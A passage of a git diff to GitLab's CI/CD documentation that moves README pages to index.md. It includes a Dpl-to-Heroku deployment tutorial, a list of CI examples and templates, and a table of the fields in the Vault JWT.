integration](https://about.gitlab.com/blog/2019/01/25/sentry-integration-blog-post/) -- [How to simplify your smart home configuration with GitLab CI/CD](https://about.gitlab.com/blog/2018/08/02/using-the-gitlab-ci-slash-cd-for-smart-home-configuration-management/) -- [Demo: GitLab + Jira + Jenkins](https://about.gitlab.com/blog/2018/07/30/gitlab-workflow-with-jira-jenkins/) -- [Introducing Auto Breakfast from GitLab (sort of)](https://about.gitlab.com/blog/2018/06/29/introducing-auto-breakfast-from-gitlab/) - -### Mobile development - -For help with using GitLab CI/CD for mobile application development, see: - -- [How to publish Android apps to the Google Play Store with GitLab and fastlane](https://about.gitlab.com/blog/2019/01/28/android-publishing-with-gitlab-and-fastlane/) -- [Setting up GitLab CI for Android projects](https://about.gitlab.com/blog/2018/10/24/setting-up-gitlab-ci-for-android-projects/) -- [Working with YAML in GitLab CI from the Android perspective](https://about.gitlab.com/blog/2017/11/20/working-with-yaml-gitlab-ci-android/) -- [How to use GitLab CI and MacStadium to build your macOS or iOS projects](https://about.gitlab.com/blog/2017/05/15/how-to-use-macstadium-and-gitlab-ci-to-build-your-macos-or-ios-projects/) -- [Setting up GitLab CI for iOS projects](https://about.gitlab.com/blog/2016/03/10/setting-up-gitlab-ci-for-ios-projects/) +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/examples/authenticating-with-hashicorp-vault/index.md b/doc/ci/examples/authenticating-with-hashicorp-vault/index.md index fc1e06e91c6..65fe9fb44d4 100644 --- a/doc/ci/examples/authenticating-with-hashicorp-vault/index.md +++ b/doc/ci/examples/authenticating-with-hashicorp-vault/index.md @@ -32,31 +32,57 @@ You must replace the `vault.example.com` URL below with the URL of your Vault se Each job has JSON Web Token (JWT) provided as CI/CD variable named `CI_JOB_JWT`. This JWT can be used to authenticate with Vault using the [JWT Auth](https://www.vaultproject.io/docs/auth/jwt#jwt-authentication) method. -The JWT's payload looks like this: +The following fields are included in the JWT: + +| Field | When | Description | +| ----------------------- | ------ | ----------- | +| `jti` | Always | Unique identifier for this token | +| `iss` | Always | Issuer, the domain of your GitLab instance | +| `iat` | Always | Issued at | +| `nbf` | Always | Not valid before | +| `exp` | Always | Expires at | +| `sub` | Always | Subject (job ID) | +| `namespace_id` | Always | Use this to scope to group or user level namespace by ID | +| `namespace_path` | Always | Use this to scope to group or user level namespace by path | +| `project_id` | Always | Use this to scope to project by ID | +| `project_path` | Always | Use this to scope to project by path | +| `user_id` | Always | ID of the user executing the job | +| `user_login` | Always | Username of the user executing the job | +| `user_email` | Always | Email of the user executing the job | +| `pipeline_id` | Always | ID of this pipeline | +| `pipeline_source` | Always | [Pipeline source](../../jobs/job_control.md#common-if-clauses-for-rules) | +| `job_id` | Always | ID of this job | +| `ref` | Always | Git ref for this job | +| `ref_type` | Always | Git ref type, either `branch` or `tag` | +| `ref_protected` | Always | `true` if this Git ref is protected, `false` otherwise | +| `environment` | Job is creating a deployment | Environment this job deploys to ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/294440) in GitLab 13.9) | +| `environment_protected` | Job is creating a deployment |`true` if deployed environment is protected, `false` otherwise ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/294440) in GitLab 13.9) | + +Example JWT payload: ```json { - "jti": "c82eeb0c-5c6f-4a33-abf5-4c474b92b558", # Unique identifier for this token - "iss": "gitlab.example.com", # Issuer, the domain of your GitLab instance - "iat": 1585710286, # Issued at - "nbf": 1585798372, # Not valid before - "exp": 1585713886, # Expire at - "sub": "job_1212", # Subject (job id) - "namespace_id": "1", # Use this to scope to group or user level namespace by id - "namespace_path": "mygroup", # Use this to scope to group or user level namespace by path - "project_id": "22", # - "project_path": "mygroup/myproject", # - "user_id": "42", # Id of the user executing the job - "user_login": "myuser" # GitLab @username - "user_email": "myuser@example.com", # Email of the user executing the job - "pipeline_id": "1212", # - "pipeline_source": "web", # Pipeline source, see: https://docs.gitlab.com/ee/ci/yaml/#common-if-clauses-for-rules - "job_id": "1212", # - "ref": "auto-deploy-2020-04-01", # Git ref for this job - "ref_type": "branch", # Git ref type, branch or tag - "ref_protected": "true", # true if this git ref is protected, false otherwise - "environment": "production", # Environment this job deploys to, if present (GitLab 13.9 and later) - "environment_protected": "true" # true if deployed environment is protected, false otherwise (GitLab 13.9 and later) + "jti": "c82eeb0c-5c6f-4a33-abf5-4c474b92b558", + "iss": "gitlab.example.com", + "iat": 1585710286, + "nbf": 1585798372, + "exp": 1585713886, + "sub": "job_1212", + "namespace_id": "1", + "namespace_path": "mygroup", + "project_id": "22", + "project_path": "mygroup/myproject", + "user_id": "42", + "user_login": "myuser", + "user_email": "myuser@example.com", + "pipeline_id": "1212", + "pipeline_source": "web", + "job_id": "1212", + "ref": "auto-deploy-2020-04-01", + "ref_type": "branch", + "ref_protected": "true", + "environment": "production", + "environment_protected": "true" } ``` @@ -204,7 +230,7 @@ read_secrets: ``` NOTE: -If you're using a Vault instance provided by HashiCorp Cloud Platform, +If you're using a Vault instance provided by HashiCorp Cloud Platform, you need to export the `VAULT_NAMESPACE` variable. Its default value is `admin`.  diff --git a/doc/ci/examples/deployment/README.md b/doc/ci/examples/deployment/README.md index 4d2c22a17f0..5ab8653dc35 100644 --- a/doc/ci/examples/deployment/README.md +++ b/doc/ci/examples/deployment/README.md @@ -1,131 +1,8 @@ --- -stage: Release -group: Release -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: tutorial +redirect_to: 'index.md' --- -# Using Dpl as deployment tool +This document was moved to [another location](index.md). -[Dpl](https://github.com/travis-ci/dpl) (pronounced like the letters D-P-L) is a deploy tool made for -continuous deployment that's developed and used by Travis CI, but can also be -used with GitLab CI/CD. - -Dpl can be used to deploy to any of the [supported providers](https://github.com/travis-ci/dpl#supported-providers). - -## Requirements - -To use Dpl you need at least Ruby 1.9.3 with ability to install gems. - -## Basic usage - -Dpl can be installed on any machine with: - -```shell -gem install dpl -``` - -This allows you to test all commands from your local terminal, rather than -having to test it on a CI server. - -If you don't have Ruby installed you can do it on Debian-compatible Linux with: - -```shell -apt-get update -apt-get install ruby-dev -``` - -The Dpl provides support for vast number of services, including: Heroku, Cloud Foundry, AWS/S3, and more. -To use it simply define provider and any additional parameters required by the provider. - -For example if you want to use it to deploy your application to Heroku, you need to specify `heroku` as provider, specify `api_key` and `app`. -All possible parameters can be found in the [Heroku API section](https://github.com/travis-ci/dpl#heroku-api). - -```yaml -staging: - stage: deploy - script: - - gem install dpl - - dpl --provider=heroku --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY -``` - -In the above example we use Dpl to deploy `my-app-staging` to Heroku server with API key stored in `HEROKU_STAGING_API_KEY` secure variable. - -To use different provider take a look at long list of [Supported Providers](https://github.com/travis-ci/dpl#supported-providers). - -## Using Dpl with Docker - -In most cases, you configured [GitLab Runner](https://docs.gitlab.com/runner/) to use your server's shell commands. -This means that all commands are run in the context of local user (e.g. `gitlab_runner` or `gitlab_ci_multi_runner`). -It also means that most probably in your Docker container you don't have the Ruby runtime installed. -You must install it: - -```yaml -staging: - stage: deploy - script: - - apt-get update -yq - - apt-get install -y ruby-dev - - gem install dpl - - dpl --provider=heroku --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY - only: - - master -``` - -The first line `apt-get update -yq` updates the list of available packages, -where second `apt-get install -y ruby-dev` installs the Ruby runtime on system. -The above example is valid for all Debian-compatible systems. - -## Usage in staging and production - -It's pretty common in the development workflow to have staging (development) and -production environments - -Let's consider the following example: we would like to deploy the `master` -branch to `staging` and all tags to the `production` environment. -The final `.gitlab-ci.yml` for that setup would look like this: - -```yaml -staging: - stage: deploy - script: - - gem install dpl - - dpl --provider=heroku --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY - only: - - master - -production: - stage: deploy - script: - - gem install dpl - - dpl --provider=heroku --app=my-app-production --api_key=$HEROKU_PRODUCTION_API_KEY - only: - - tags -``` - -We created two deploy jobs that are executed on different events: - -1. `staging` is executed for all commits that were pushed to `master` branch, -1. `production` is executed for all pushed tags. - -We also use two secure variables: - -1. `HEROKU_STAGING_API_KEY` - Heroku API key used to deploy staging app, -1. `HEROKU_PRODUCTION_API_KEY` - Heroku API key used to deploy production app. - -## Storing API keys - -To add secure variables, navigate to your project's -**Settings > CI/CD > Variables**. The variables that are defined -in the project settings are sent along with the build script to the runner. -The secure variables are stored out of the repository. Never store secrets in -your project's `.gitlab-ci.yml`. It is also important that the secret's value -is hidden in the job log. - -You access added variable by prefixing it's name with `$` (on non-Windows runners) -or `%` (for Windows Batch runners): - -1. `$VARIABLE` - use it for non-Windows runners -1. `%VARIABLE%` - use it for Windows Batch runners - -Read more about the [CI/CD variables](../../variables/README.md). +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/examples/deployment/index.md b/doc/ci/examples/deployment/index.md new file mode 100644 index 00000000000..00c613865a3 --- /dev/null +++ b/doc/ci/examples/deployment/index.md @@ -0,0 +1,131 @@ +--- +stage: Release +group: Release +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: tutorial +--- + +# Using Dpl as deployment tool + +[Dpl](https://github.com/travis-ci/dpl) (pronounced like the letters D-P-L) is a deploy tool made for +continuous deployment that's developed and used by Travis CI, but can also be +used with GitLab CI/CD. + +Dpl can be used to deploy to any of the [supported providers](https://github.com/travis-ci/dpl#supported-providers). + +## Requirements + +To use Dpl you need at least Ruby 1.9.3 with ability to install gems. + +## Basic usage + +Dpl can be installed on any machine with: + +```shell +gem install dpl +``` + +This allows you to test all commands from your local terminal, rather than +having to test it on a CI server. + +If you don't have Ruby installed you can do it on Debian-compatible Linux with: + +```shell +apt-get update +apt-get install ruby-dev +``` + +The Dpl provides support for vast number of services, including: Heroku, Cloud Foundry, AWS/S3, and more. +To use it simply define provider and any additional parameters required by the provider. + +For example if you want to use it to deploy your application to Heroku, you need to specify `heroku` as provider, specify `api_key` and `app`. +All possible parameters can be found in the [Heroku API section](https://github.com/travis-ci/dpl#heroku-api). + +```yaml +staging: + stage: deploy + script: + - gem install dpl + - dpl --provider=heroku --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY +``` + +In the above example we use Dpl to deploy `my-app-staging` to Heroku server with API key stored in `HEROKU_STAGING_API_KEY` secure variable. + +To use different provider take a look at long list of [Supported Providers](https://github.com/travis-ci/dpl#supported-providers). + +## Using Dpl with Docker + +In most cases, you configured [GitLab Runner](https://docs.gitlab.com/runner/) to use your server's shell commands. +This means that all commands are run in the context of local user (e.g. `gitlab_runner` or `gitlab_ci_multi_runner`). +It also means that most probably in your Docker container you don't have the Ruby runtime installed. +You must install it: + +```yaml +staging: + stage: deploy + script: + - apt-get update -yq + - apt-get install -y ruby-dev + - gem install dpl + - dpl --provider=heroku --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY + only: + - master +``` + +The first line `apt-get update -yq` updates the list of available packages, +where second `apt-get install -y ruby-dev` installs the Ruby runtime on system. +The above example is valid for all Debian-compatible systems. + +## Usage in staging and production + +It's pretty common in the development workflow to have staging (development) and +production environments + +Let's consider the following example: we would like to deploy the `master` +branch to `staging` and all tags to the `production` environment. +The final `.gitlab-ci.yml` for that setup would look like this: + +```yaml +staging: + stage: deploy + script: + - gem install dpl + - dpl --provider=heroku --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY + only: + - master + +production: + stage: deploy + script: + - gem install dpl + - dpl --provider=heroku --app=my-app-production --api_key=$HEROKU_PRODUCTION_API_KEY + only: + - tags +``` + +We created two deploy jobs that are executed on different events: + +1. `staging` is executed for all commits that were pushed to `master` branch, +1. `production` is executed for all pushed tags. + +We also use two secure variables: + +1. `HEROKU_STAGING_API_KEY` - Heroku API key used to deploy staging app, +1. `HEROKU_PRODUCTION_API_KEY` - Heroku API key used to deploy production app. + +## Storing API keys + +To add secure variables, navigate to your project's +**Settings > CI/CD > Variables**. The variables that are defined +in the project settings are sent along with the build script to the runner. +The secure variables are stored out of the repository. Never store secrets in +your project's `.gitlab-ci.yml`. It is also important that the secret's value +is hidden in the job log. + +You access added variable by prefixing it's name with `$` (on non-Windows runners) +or `%` (for Windows Batch runners): + +1. `$VARIABLE` - use it for non-Windows runners +1. `%VARIABLE%` - use it for Windows Batch runners + +Read more about the [CI/CD variables](../../variables/index.md). diff --git a/doc/ci/examples/end_to_end_testing_webdriverio/index.md b/doc/ci/examples/end_to_end_testing_webdriverio/index.md index 54e12cafa55..7a6d692cd43 100644 --- a/doc/ci/examples/end_to_end_testing_webdriverio/index.md +++ b/doc/ci/examples/end_to_end_testing_webdriverio/index.md @@ -146,10 +146,10 @@ new browser window interacting with your app as you specified. Which brings us to the exciting part: how do we run this in GitLab CI/CD? There are two things we need to do for this: -1. Set up [CI/CD jobs](../../yaml/README.md) that actually have a browser available. +1. Set up [CI/CD jobs](../../yaml/index.md) that actually have a browser available. 1. Update our WebdriverIO configuration to use those browsers to visit the review apps. -For the scope of this article, we've defined an additional [CI/CD stage](../../yaml/README.md#stages) +For the scope of this article, we've defined an additional [CI/CD stage](../../yaml/index.md#stages) `confidence-check` that is executed _after_ the stage that deploys the review app. It uses the `node:latest` [Docker image](../../docker/using_docker_images.md). However, WebdriverIO fires up actual browsers to interact with your application, so we need to install and run them. @@ -191,7 +191,7 @@ option as an argument to `npm run confidence-check` on the command line. However, we still need to tell WebdriverIO which browser is available for it to use. [GitLab CI/CD makes -a number of variables available](../../variables/README.md#predefined-cicd-variables) +a number of variables available](../../variables/index.md#predefined-cicd-variables) with information about the current CI job. We can use this information to dynamically set up our WebdriverIO configuration according to the job that is running. More specifically, we can tell WebdriverIO what browser to execute the test on depending on the name of the currently running @@ -255,5 +255,5 @@ production project, see: There's plenty more that WebdriverIO can do. For example, you can configure a [`screenshotPath`](http://v4.webdriver.io/guide/getstarted/configuration.html#screenshotPath) to tell WebdriverIO to take a screenshot when tests are failing. Then tell GitLab CI/CD to store those -[artifacts](../../yaml/README.md#artifacts), and you'll be able to see what went +[artifacts](../../yaml/index.md#artifacts), and you'll be able to see what went wrong within GitLab. diff --git a/doc/ci/examples/index.md b/doc/ci/examples/index.md new file mode 100644 index 00000000000..9d6a4f53123 --- /dev/null +++ b/doc/ci/examples/index.md @@ -0,0 +1,182 @@ +--- +stage: Verify +group: Pipeline Execution +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +comments: false +type: index +--- + +# GitLab CI/CD Examples + +This page contains links to a variety of examples that can help you understand how to +implement [GitLab CI/CD](../README.md) for your specific use case. + +Examples are available in several forms. As a collection of: + +- `.gitlab-ci.yml` [template files](#cicd-templates) maintained in GitLab, for many + common frameworks and programming languages. +- Repositories with [example projects](https://gitlab.com/gitlab-examples) for various languages. You can fork and adjust them to your own needs. Projects include an example of using [Review Apps with a static site served by NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx/). +- Examples and [other resources](#other-resources) listed below. + +## CI/CD examples + +The following table lists examples with step-by-step tutorials that are contained in this section: + +| Use case | Resource | +|-------------------------------|----------| +| Browser performance testing | [Browser Performance Testing with the Sitespeed.io container](../../user/project/merge_requests/browser_performance_testing.md). | +| Deployment with Dpl | [Using `dpl` as deployment tool](deployment/index.md). | +| GitLab Pages | See the [GitLab Pages](../../user/project/pages/index.md) documentation for a complete example of deploying a static site. | +| End-to-end testing | [End-to-end testing with GitLab CI/CD and WebdriverIO](end_to_end_testing_webdriverio/index.md). | +| Load performance testing | [Load Performance Testing with the k6 container](../../user/project/merge_requests/load_performance_testing.md). | +| Multi project pipeline | [Build, test deploy using multi project pipeline](https://gitlab.com/gitlab-examples/upstream-project). | +| npm with semantic-release | [Publish npm packages to the GitLab Package Registry using semantic-release](semantic-release.md). | +| PHP with Laravel, Envoy | [Test and deploy Laravel applications with GitLab CI/CD and Envoy](laravel_with_gitlab_and_envoy/index.md). | +| PHP with npm, SCP | [Running Composer and npm scripts with deployment via SCP in GitLab CI/CD](deployment/composer-npm-deploy.md). | +| PHP with PHPunit, `atoum` | [Testing PHP projects](php.md). | +| Secrets management with Vault | [Authenticating and Reading Secrets With HashiCorp Vault](authenticating-with-hashicorp-vault/index.md). | + +### Contributed examples + +You can help people that use your favorite programming language by submitting a link +to a guide for that language. These contributed guides are hosted externally or in +separate example projects: + +| Use case | Resource | +|-------------------------------|----------| +| Clojure | [Test a Clojure application with GitLab CI/CD](https://gitlab.com/gitlab-examples/clojure-web-application). | +| Game development | [DevOps and Game Development with GitLab CI/CD](https://gitlab.com/gitlab-examples/gitlab-game-demo/). | +| Java with Maven | [How to deploy Maven projects to Artifactory with GitLab CI/CD](https://gitlab.com/gitlab-examples/maven/simple-maven-example). | +| Java with Spring Boot | [Deploy a Spring Boot application to Cloud Foundry with GitLab CI/CD](https://gitlab.com/gitlab-examples/spring-gitlab-cf-deploy-demo). | +| Parallel testing Ruby & JS | [GitLab CI/CD parallel jobs testing for Ruby & JavaScript projects](https://docs.knapsackpro.com/2019/how-to-run-parallel-jobs-for-rspec-tests-on-gitlab-ci-pipeline-and-speed-up-ruby-javascript-testing). | +| Python on Heroku | [Test and deploy a Python application with GitLab CI/CD](https://gitlab.com/gitlab-examples/python-getting-started). | +| Ruby on Heroku | [Test and deploy a Ruby application with GitLab CI/CD](https://gitlab.com/gitlab-examples/ruby-getting-started). | +| Scala on Heroku | [Test and deploy a Scala application to Heroku](https://gitlab.com/gitlab-examples/scala-sbt). | + +## CI/CD templates + +Get started with GitLab CI/CD and your favorite programming language or framework by using a +`.gitlab-ci.yml` [template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). + +When you create a `gitlab-ci.yml` file in the UI, you can +choose one of these templates: + +- [Android (`Android.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android.gitlab-ci.yml) +- [Android with fastlane (`Android-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android-Fastlane.gitlab-ci.yml) +- [Bash (`Bash.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Bash.gitlab-ci.yml) +- [C++ (`C++.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/C++.gitlab-ci.yml) +- [Chef (`Chef.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Chef.gitlab-ci.yml) +- [Clojure (`Clojure.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Clojure.gitlab-ci.yml) +- [Composer `Composer.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Composer.gitlab-ci.yml) +- [Crystal (`Crystal.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Crystal.gitlab-ci.yml) +- [Dart (`Dart.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Dart.gitlab-ci.yml) +- [Django (`Django.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Django.gitlab-ci.yml) +- [Docker (`Docker.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml) +- [dotNET (`dotNET.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET.gitlab-ci.yml) +- [dotNET Core (`dotNET-Core.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET-Core.yml) +- [Elixir (`Elixir.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Elixir.gitlab-ci.yml) +- [Flutter (`Flutter.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Flutter.gitlab-ci.yml) +- [goLang (`Go.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Go.gitlab-ci.yml) +- [Gradle (`Gradle.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Gradle.gitlab-ci.yml) +- [Grails (`Grails.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Grails.gitlab-ci.yml) +- [iOS with fastlane (`iOS-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/iOS-Fastlane.gitlab-ci.yml) +- [Julia (`Julia.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Julia.gitlab-ci.yml) +- [Laravel (`Laravel.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Laravel.gitlab-ci.yml) +- [LaTeX (`LaTeX.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/LaTeX.gitlab-ci.yml) +- [Maven (`Maven.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml) +- [Mono (`Mono.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Mono.gitlab-ci.yml) +- [npm (`npm.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/npm.gitlab-ci.yml) +- [Node.js (`Nodejs.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Nodejs.gitlab-ci.yml) +- [OpenShift (`OpenShift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/OpenShift.gitlab-ci.yml) +- [Packer (`Packer.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Packer.gitlab-ci.yml) +- [PHP (`PHP.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/PHP.gitlab-ci.yml) +- [Python (`Python.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Python.gitlab-ci.yml) +- [Ruby (`Ruby.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Ruby.gitlab-ci.yml) +- [Rust (`Rust.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Rust.gitlab-ci.yml) +- [Scala (`Scala.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Scala.gitlab-ci.yml) +- [Swift (`Swift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Swift.gitlab-ci.yml) +- [Terraform (`Terraform.latest.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.latest.gitlab-ci.yml) + +If a programming language or framework template is not in this list, you can contribute +one. To create a template, submit a merge request +to [the templates list](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). + +### Adding templates to your GitLab installation **(PREMIUM SELF)** + +You can add custom examples and templates to your self-managed GitLab instance. +Your GitLab administrator can [designate an instance template repository](../../user/admin_area/settings/instance_template_repository.md) +that contains examples and templates specific to your organization. + +## Other resources + +This section provides further resources to help you get familiar with various uses of GitLab CI/CD. +Note that older articles and videos may not reflect the state of the latest GitLab release. + +### CI/CD in the cloud + +For examples of setting up GitLab CI/CD for cloud-based environments, see: + +- [How to set up multi-account AWS SAM deployments with GitLab CI](https://about.gitlab.com/blog/2019/02/04/multi-account-aws-sam-deployments-with-gitlab-ci/) +- [Automating Kubernetes Deployments with GitLab CI/CD](https://www.youtube.com/watch?v=wEDRfAz6_Uw) +- [How to autoscale continuous deployment with GitLab Runner on DigitalOcean](https://about.gitlab.com/blog/2018/06/19/autoscale-continuous-deployment-gitlab-runner-digital-ocean/) +- [How to create a CI/CD pipeline with Auto Deploy to Kubernetes using GitLab and Helm](https://about.gitlab.com/blog/2017/09/21/how-to-create-ci-cd-pipeline-with-autodeploy-to-kubernetes-using-gitlab-and-helm/) +- [Demo - Deploying from GitLab to OpenShift Container Cluster](https://youtu.be/EwbhA53Jpp4) + +See also the following video overviews: + +- [Kubernetes, GitLab, and Cloud Native](https://www.youtube.com/watch?v=d-9awBxEbvQ). +- [Deploying to IBM Cloud with GitLab CI/CD](https://www.youtube.com/watch?v=6ZF4vgKMd-g). + +### Customer stories + +For some customer experiences with GitLab CI/CD, see: + +- [How Verizon Connect reduced data center deploys from 30 days to under 8 hours with GitLab](https://about.gitlab.com/blog/2019/02/14/verizon-customer-story/) +- [How Wag! cut their release process from 40 minutes to just 6](https://about.gitlab.com/blog/2019/01/16/wag-labs-blog-post/) +- [How Jaguar Land Rover embraced CI to speed up their software lifecycle](https://about.gitlab.com/blog/2018/07/23/chris-hill-devops-enterprise-summit-talk/) + +### Getting started + +For some examples to help get you started, see: + +- [GitLab CI/CD's 2018 highlights](https://about.gitlab.com/blog/2019/01/21/gitlab-ci-cd-features-improvements/) +- [A beginner's guide to continuous integration](https://about.gitlab.com/blog/2018/01/22/a-beginners-guide-to-continuous-integration/) + +### Implementing GitLab CI/CD + +For examples of others who have implemented GitLab CI/CD, see: + +- [How to streamline interactions between multiple repositories with multi-project pipelines](https://about.gitlab.com/blog/2018/10/31/use-multiproject-pipelines-with-gitlab-cicd/) +- [How we used GitLab CI to build GitLab faster](https://about.gitlab.com/blog/2018/05/02/using-gitlab-ci-to-build-gitlab-faster/) +- [Test all the things in GitLab CI with Docker by example](https://about.gitlab.com/blog/2018/02/05/test-all-the-things-gitlab-ci-docker-examples/) +- [A Craftsman looks at continuous integration](https://about.gitlab.com/blog/2018/01/17/craftsman-looks-at-continuous-integration/) +- [Go tools and GitLab: How to do continuous integration like a boss](https://about.gitlab.com/blog/2017/11/27/go-tools-and-gitlab-how-to-do-continuous-integration-like-a-boss/) +- [GitBot – automating boring Git operations with CI](https://about.gitlab.com/blog/2017/11/02/automating-boring-git-operations-gitlab-ci/) +- [How to use GitLab CI for Vue.js](https://about.gitlab.com/blog/2017/09/12/vuejs-app-gitlab/) +- Video: [GitLab CI/CD Deep Dive](https://youtu.be/pBe4t1CD8Fc?t=195) +- [Dockerizing GitLab Review Apps](https://about.gitlab.com/blog/2017/07/11/dockerizing-review-apps/) +- [Fast and natural continuous integration with GitLab CI](https://about.gitlab.com/blog/2017/05/22/fast-and-natural-continuous-integration-with-gitlab-ci/) +- [Demo: CI/CD with GitLab in action](https://about.gitlab.com/blog/2017/03/13/ci-cd-demo/) + +### Migrating to GitLab from third-party CI tools + +- [Migrating from Jenkins to GitLab](https://youtu.be/RlEVGOpYF5Y) + +### Integrating GitLab CI/CD with other systems + +To see how you can integrate GitLab CI/CD with third-party systems, see: + +- [Streamline and shorten error remediation with Sentry's new GitLab integration](https://about.gitlab.com/blog/2019/01/25/sentry-integration-blog-post/) +- [How to simplify your smart home configuration with GitLab CI/CD](https://about.gitlab.com/blog/2018/08/02/using-the-gitlab-ci-slash-cd-for-smart-home-configuration-management/) +- [Demo: GitLab + Jira + Jenkins](https://about.gitlab.com/blog/2018/07/30/gitlab-workflow-with-jira-jenkins/) +- [Introducing Auto Breakfast from GitLab (sort of)](https://about.gitlab.com/blog/2018/06/29/introducing-auto-breakfast-from-gitlab/) + +### Mobile development + +For help with using GitLab CI/CD for mobile application development, see: + +- [How to publish Android apps to the Google Play Store with GitLab and fastlane](https://about.gitlab.com/blog/2019/01/28/android-publishing-with-gitlab-and-fastlane/) +- [Setting up GitLab CI for Android projects](https://about.gitlab.com/blog/2018/10/24/setting-up-gitlab-ci-for-android-projects/) +- [Working with YAML in GitLab CI from the Android perspective](https://about.gitlab.com/blog/2017/11/20/working-with-yaml-gitlab-ci-android/) +- [How to use GitLab CI and MacStadium to build your macOS or iOS projects](https://about.gitlab.com/blog/2017/05/15/how-to-use-macstadium-and-gitlab-ci-to-build-your-macos-or-ios-projects/) +- [Setting up GitLab CI for iOS projects](https://about.gitlab.com/blog/2016/03/10/setting-up-gitlab-ci-for-ios-projects/) diff --git a/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md b/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md index 5f08f2954f5..c511839b3e4 100644 --- a/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md +++ b/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md @@ -11,7 +11,7 @@ date: 2017-08-31 <!-- vale off --> -# Test and deploy Laravel applications with GitLab CI/CD and Envoy +# Test and deploy Laravel applications with GitLab CI/CD and Envoy **(FREE)** ## Introduction @@ -106,7 +106,7 @@ sudo apt install acl ### Add SSH key -Let's suppose we want to deploy our app to the production server from a private repository on GitLab. First, we need to [generate a new SSH key pair **with no passphrase**](../../../ssh/README.md) for the deployer user. +Let's suppose we 